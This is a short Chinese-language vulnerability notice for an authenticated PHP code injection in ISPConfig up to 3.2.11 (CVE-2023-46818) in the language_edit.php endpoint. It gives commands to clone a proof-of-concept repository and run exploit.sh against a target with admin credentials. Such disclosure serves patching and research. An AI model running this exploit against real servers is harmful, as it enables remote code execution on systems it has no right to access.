ISPConfig - PHP代码注入PoC漏洞利用(Bash)
ISPConfig 版本 <= 3.2.11 存在一个已验证的PHP代码注入漏洞,该漏洞通过 /admin/language_edit.php 端点中的 records[] 参数触发。恶意认证管理员可以利用此漏洞注入任意PHP代码,从而导致远程代码执行。该漏洞源于对动态生成的PHP代码中使用的语言文件输入处理不当,未进行充分的清理。
git clone https://github.com/engranaabubakar/CVE-2023-46818.git
cd CVE-2023-46818
chmod +x exploit.sh
./exploit.sh http://$IP admin admin
研究者:Rana Abu Bakar
原始公告:https://karmainsecurity.com/KIS-2023-13